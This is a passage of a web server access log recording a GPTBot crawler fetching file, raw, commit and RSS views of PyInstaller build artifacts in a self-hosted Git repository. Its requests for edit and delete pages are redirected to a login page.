"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:18:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:18:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:18:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:18:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11156] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:18:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11156] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:18:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11158] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:18:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:18:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9836] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9835] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9834] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9834] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9836] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9834] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9836] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9836] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9837] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9837] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11156] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:18:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9837] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 